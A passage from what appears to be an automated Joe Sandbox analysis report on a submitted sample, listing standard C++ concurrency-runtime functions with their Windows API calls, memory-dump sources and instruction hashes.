                                                                                                                                                                                                                                            • RegisterWaitForSingleObject.KERNEL32(?,00000000,00423592,000000A4,000000FF,0000000C), ref: 024A286F
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,024A8830,?,?,?,?,00000000,?,00000000), ref: 024A287E
                                                                                                                                                                                                                                            • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024A2894
                                                                                                                                                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 024A28A2
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastObjectRegisterSingleThrowWait
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3803302727-0
                                                                                                                                                                                                                                            • Opcode ID: 2ae2fd32a1d2a838208ab3d1a8fced2e3adc472ac1278b377655e8aa8aae26b1
                                                                                                                                                                                                                                            • Instruction ID: 5b178edeeb9e694e79348fd3ea74aa3d72978b0baca00257bc04dd5c53f34f05
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2ae2fd32a1d2a838208ab3d1a8fced2e3adc472ac1278b377655e8aa8aae26b1
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 43F0A07450010ABBCF00EFE5CD44EAF37B86B00701F20061AB914E20A0DB74D604AB64
                                                                                                                                                                                                                                            Function 004125F1 Relevance: 6.0, APIs: 4, Instructions: 29registryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • RegisterWaitForSingleObject.KERNEL32(?,00000000,00423592,000000A4,000000FF,0000000C), ref: 00412608
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,004185C9,?,?,?,?,00000000,?,00000000), ref: 00412617
                                                                                                                                                                                                                                            • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041262D
                                                                                                                                                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0041263B
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastObjectRegisterSingleThrowWait
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3803302727-0
                                                                                                                                                                                                                                            • Opcode ID: 2ae2fd32a1d2a838208ab3d1a8fced2e3adc472ac1278b377655e8aa8aae26b1
                                                                                                                                                                                                                                            • Instruction ID: 24969db738fe4d1a967b5a52fd3328d3273a2fbbb48021401f3901a8ee12547a
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2ae2fd32a1d2a838208ab3d1a8fced2e3adc472ac1278b377655e8aa8aae26b1
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7FF0A03460010AFBCF00EFA5DE46EEF37687B00745F600616B610E20E1EB79DA549768
                                                                                                                                                                                                                                            Function 024A257D Relevance: 6.0, APIs: 4, Instructions: 28COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • ___crtCreateEventExW.LIBCPMT ref: 024A2593
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,024A0DA0), ref: 024A25A1
                                                                                                                                                                                                                                            • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024A25B7
                                                                                                                                                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 024A25C5
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorEventException@8LastThrow___crt
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 200240550-0
                                                                                                                                                                                                                                            • Opcode ID: b13ab56965c0887775dfe6ae7b5ceab245a5f6078597de59d26007bfcb9aef54
                                                                                                                                                                                                                                            • Instruction ID: 3a96b71ea9408bb28c296cf4102a922ad59a4c9c7cf212227c5e00dea17457b8
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b13ab56965c0887775dfe6ae7b5ceab245a5f6078597de59d26007bfcb9aef54
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 91E0D861A002153AEB10F7768C26F7F369C9B20B41F84085BBD14E11C1FAD4D10059B4
                                                                                                                                                                                                                                            Function 00412316 Relevance: 6.0, APIs: 4, Instructions: 28COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • ___crtCreateEventExW.LIBCPMT ref: 0041232C
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,00410B39), ref: 0041233A
                                                                                                                                                                                                                                            • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412350
                                                                                                                                                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0041235E
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorEventException@8LastThrow___crt
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 200240550-0
                                                                                                                                                                                                                                            • Opcode ID: b13ab56965c0887775dfe6ae7b5ceab245a5f6078597de59d26007bfcb9aef54
                                                                                                                                                                                                                                            • Instruction ID: 785b6ff49928477fe7b23022ebabbc79c69e7cefd8d4159d1ac4e3541b52c9d2
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b13ab56965c0887775dfe6ae7b5ceab245a5f6078597de59d26007bfcb9aef54
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 01E0D871A0021929E710B7768E03FBF369C6B00B49F54096ABE14E51D3FDACD65042AC
                                                                                                                                                                                                                                            Function 024A9530 Relevance: 6.0, APIs: 4, Instructions: 26memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 024A2959: TlsAlloc.KERNEL32(?,024A0DA0), ref: 024A295F
                                                                                                                                                                                                                                            • TlsAlloc.KERNEL32(?,024A0DA0), ref: 024B3BE6
                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 024B3BF8
                                                                                                                                                                                                                                            • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024B3C0E
                                                                                                                                                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 024B3C1C
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Alloc$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3735082963-0
                                                                                                                                                                                                                                            • Opcode ID: 66048b5912d9800ecb047d2b21c4276ce59f10e340e5510923950ad1c38f33ca
                                                                                                                                                                                                                                            • Instruction ID: b3c97a95c1233cc29df054eb62f286d4cf722dc31770e959dbb7d71aa340c71b
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 66048b5912d9800ecb047d2b21c4276ce59f10e340e5510923950ad1c38f33ca
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EFE061745042016FC700FF775C556BF3A686E007017100E7BE529D2191EB34D0454F7C
                                                                                                                                                                                                                                            Function 004192C9 Relevance: 6.0, APIs: 4, Instructions: 26memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 004126F2: TlsAlloc.KERNEL32(?,00410B39), ref: 004126F8
                                                                                                                                                                                                                                            • TlsAlloc.KERNEL32(?,00410B39), ref: 0042397F
                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00423991
                                                                                                                                                                                                                                            • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004239A7
                                                                                                                                                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 004239B5
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Alloc$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3735082963-0
                                                                                                                                                                                                                                            • Opcode ID: 66048b5912d9800ecb047d2b21c4276ce59f10e340e5510923950ad1c38f33ca
                                                                                                                                                                                                                                            • Instruction ID: d941d7adcdfcb95fe7f1ae92eeb0e95f25cd9e5dbb2d3936931fab3d4402dca1
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 66048b5912d9800ecb047d2b21c4276ce59f10e340e5510923950ad1c38f33ca
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FEE02BB09002206EC300BF766C4A66E3274750130AB500B2BB151D21D2EEBCD1844A9D
                                                                                                                                                                                                                                            Function 024A2794 Relevance: 6.0, APIs: 4, Instructions: 24COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetNumaHighestNodeNumber.KERNEL32(?,?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,024A0DA0), ref: 024A279E
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,024A0DA0), ref: 024A27AD
                                                                                                                                                                                                                                            • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024A27C3
                                                                                                                                                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 024A27D1
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8HighestLastNodeNumaNumberThrow
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3016159387-0
                                                                                                                                                                                                                                            • Opcode ID: aa1fe1726c391e6c90679c86a0ef38e15e3ee04fdf49ded71e00b6b13b472e10
                                                                                                                                                                                                                                            • Instruction ID: 86d11cf1b1ea1a6c194e31be25a5354771eedb02b7757a04601ed483c977df47
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: aa1fe1726c391e6c90679c86a0ef38e15e3ee04fdf49ded71e00b6b13b472e10
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: ADE0867C60010AA7CB00FBB6DD49EAF73BC6E10B05B600566A905E3150EBA8D7089B79
                                                                                                                                                                                                                                            Function 0041252D Relevance: 6.0, APIs: 4, Instructions: 24COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetNumaHighestNodeNumber.KERNEL32(?,?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,00410B39), ref: 00412537
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,00410B39), ref: 00412546
                                                                                                                                                                                                                                            • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041255C
                                                                                                                                                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0041256A
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8HighestLastNodeNumaNumberThrow
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3016159387-0
                                                                                                                                                                                                                                            • Opcode ID: aa1fe1726c391e6c90679c86a0ef38e15e3ee04fdf49ded71e00b6b13b472e10
                                                                                                                                                                                                                                            • Instruction ID: 7399f334bae95f1f5dd7aa6ec606231f62b338b040d4ba0de61eab0e9ab47a66
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: aa1fe1726c391e6c90679c86a0ef38e15e3ee04fdf49ded71e00b6b13b472e10
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A1E0D87060010AABC700EBB5DE4AAEF73BC7A00605B600166A101E2151EA6CDA44877C
                                                                                                                                                                                                                                            Function 024A28EC Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • SetThreadPriority.KERNEL32(?,?), ref: 024A28F8
                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 024A2904
                                                                                                                                                                                                                                            • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024A291A
                                                                                                                                                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 024A2928
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastPriorityThreadThrow
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 4286982218-0
                                                                                                                                                                                                                                            • Opcode ID: 2e8a5abc4ba5302a065f6319043aedef3fe0da521bb0a121bd2973cc84f30b77
                                                                                                                                                                                                                                            • Instruction ID: df36c4138965ba6795728a2015c1251380815ce3c20f7dd82acac46429a2ea21
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2e8a5abc4ba5302a065f6319043aedef3fe0da521bb0a121bd2973cc84f30b77
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9FE0863460010967DB14FF72CC05BBB376C7F10B45B500926BD19D20A0EB75D1049AA8
                                                                                                                                                                                                                                            Function 024A29B2 Relevance: 6.0, APIs: 4, Instructions: 23COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • TlsSetValue.KERNEL32(?,00000000,024A7BD8,00000000,?,?,024A0DA0,?,?,?,00000000,?,00000000), ref: 024A29BE
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,00000000,?,00000000), ref: 024A29CA
                                                                                                                                                                                                                                            • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024A29E0
                                                                                                                                                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 024A29EE
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrowValue
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1964976909-0
                                                                                                                                                                                                                                            • Opcode ID: e92b9239321077a6426b58042713b272637ac11e22ba0cdbfa846f2b38cfd992
                                                                                                                                                                                                                                            • Instruction ID: ea74fe14828d9e44e23c0c8f59f6b3d5d4302b0e7e13ed2f12297a5d37604dbd
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e92b9239321077a6426b58042713b272637ac11e22ba0cdbfa846f2b38cfd992
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 50E086742001096BDB10FF71CC08BBF376C7F10B45B500926BD19D10A0EB75D114AAA8
                                                                                                                                                                                                                                            Function 00412685 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • SetThreadPriority.KERNEL32(?,?), ref: 00412691
                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 0041269D
                                                                                                                                                                                                                                            • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004126B3
                                                                                                                                                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 004126C1
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastPriorityThreadThrow
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 4286982218-0
                                                                                                                                                                                                                                            • Opcode ID: 2e8a5abc4ba5302a065f6319043aedef3fe0da521bb0a121bd2973cc84f30b77
                                                                                                                                                                                                                                            • Instruction ID: eb1a6d40bee4d863ba02ef3eb8c9f1a5d1f26ddbf15ae4e912fb13e181a4c061
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2e8a5abc4ba5302a065f6319043aedef3fe0da521bb0a121bd2973cc84f30b77
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3CE04F34600119ABCB14BF619E06BAF376C7A00745B50052AB515D10A2EE79D564869C
                                                                                                                                                                                                                                            Function 0041274B Relevance: 6.0, APIs: 4, Instructions: 23COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • TlsSetValue.KERNEL32(?,00000000,00417971,00000000,?,?,00410B39,?,?,?,00000000,?,00000000), ref: 00412757
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,00000000,?,00000000), ref: 00412763
                                                                                                                                                                                                                                            • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412779
                                                                                                                                                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00412787
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrowValue
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1964976909-0
                                                                                                                                                                                                                                            • Opcode ID: e92b9239321077a6426b58042713b272637ac11e22ba0cdbfa846f2b38cfd992
                                                                                                                                                                                                                                            • Instruction ID: 63a90eab5ccd82633b541feab557f5b3d99097aee930e3f4eaa44923ec20be65
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e92b9239321077a6426b58042713b272637ac11e22ba0cdbfa846f2b38cfd992
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 43E04F34600119AADB10BF619E0AAAF37A87A00A45B50052AB915D10A2EE79D564869C
                                                                                                                                                                                                                                            Function 024A2959 Relevance: 6.0, APIs: 4, Instructions: 21memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • TlsAlloc.KERNEL32(?,024A0DA0), ref: 024A295F
                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 024A296C
                                                                                                                                                                                                                                            • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024A2982
                                                                                                                                                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 024A2990
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: AllocConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3103352999-0
                                                                                                                                                                                                                                            • Opcode ID: cf5c7426e44f0e531d76730010d1233fe0a142eb59a03d1d9f3b17062cc15993
                                                                                                                                                                                                                                            • Instruction ID: b69a824207fba3da389de3e87c5744bc4b3fc70d9c3239280e3e36a703973d80
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cf5c7426e44f0e531d76730010d1233fe0a142eb59a03d1d9f3b17062cc15993
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 37E02B7410010567C714FBB99C4CBBF32AC7F11B15B600F2BF865E20E0EBA8D1085AAC
                                                                                                                                                                                                                                            Function 004126F2 Relevance: 6.0, APIs: 4, Instructions: 21memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • TlsAlloc.KERNEL32(?,00410B39), ref: 004126F8
                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00412705
                                                                                                                                                                                                                                            • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041271B
                                                                                                                                                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00412729
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: AllocConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3103352999-0
                                                                                                                                                                                                                                            • Opcode ID: cf5c7426e44f0e531d76730010d1233fe0a142eb59a03d1d9f3b17062cc15993
                                                                                                                                                                                                                                            • Instruction ID: 71e6de1c8af28f534afd96217d060265c7bf952bbd0c624222ea3419adf54434
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cf5c7426e44f0e531d76730010d1233fe0a142eb59a03d1d9f3b17062cc15993
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2AE0CD34500115578714BB755D0AABF72587901719B600B1AF131D20D1FB6CD458429C
                                                                                                                                                                                                                                            Function 024A20FF Relevance: 6.0, APIs: 4, Instructions: 20COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • Concurrency::critical_section::unlock.LIBCMT ref: 024A2103
                                                                                                                                                                                                                                              • Part of subcall function 024A1379: Concurrency::details::LockQueueNode::WaitForNextNode.LIBCMT ref: 024A139A
                                                                                                                                                                                                                                              • Part of subcall function 024A1379: Concurrency::details::LockQueueNode::WaitForNextNode.LIBCMT ref: 024A13D1
                                                                                                                                                                                                                                              • Part of subcall function 024A1379: Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 024A13DD
                                                                                                                                                                                                                                            • Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 024A210F
                                                                                                                                                                                                                                              • Part of subcall function 024A0CEA: Concurrency::critical_section::unlock.LIBCMT ref: 024A0D0E
                                                                                                                                                                                                                                            • Concurrency::Context::Block.LIBCONCRT ref: 024A2114
                                                                                                                                                                                                                                              • Part of subcall function 024A2EC8: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 024A2ECA
                                                                                                                                                                                                                                            • Concurrency::critical_section::lock.LIBCONCRT ref: 024A2134
                                                                                                                                                                                                                                              • Part of subcall function 024A12A2: Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 024A12B0
                                                                                                                                                                                                                                              • Part of subcall function 024A12A2: Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 024A12BD
                                                                                                                                                                                                                                              • Part of subcall function 024A12A2: Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 024A12C8
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Concurrency::details::LockQueue$NodeNode::$Concurrency::critical_section::_Concurrency::critical_section::unlockNextWait$Acquire_lockBase::BlockConcurrency::Concurrency::critical_section::lockConcurrency::details::_ContextContext::CurrentDerefLock::_ReaderSchedulerScoped_lockScoped_lock::~_Switch_to_activeTimerWriter
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3659872527-0
                                                                                                                                                                                                                                            • Opcode ID: 82de0933dc6785f3946ddc0ad7c0081e97ef1b3c93ec0f171fb3e506e287e00c
                                                                                                                                                                                                                                            • Instruction ID: a24951516481356b312b25766a7e9b34049d069ee6d3c0965160161cd05c5ee3
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 82de0933dc6785f3946ddc0ad7c0081e97ef1b3c93ec0f171fb3e506e287e00c
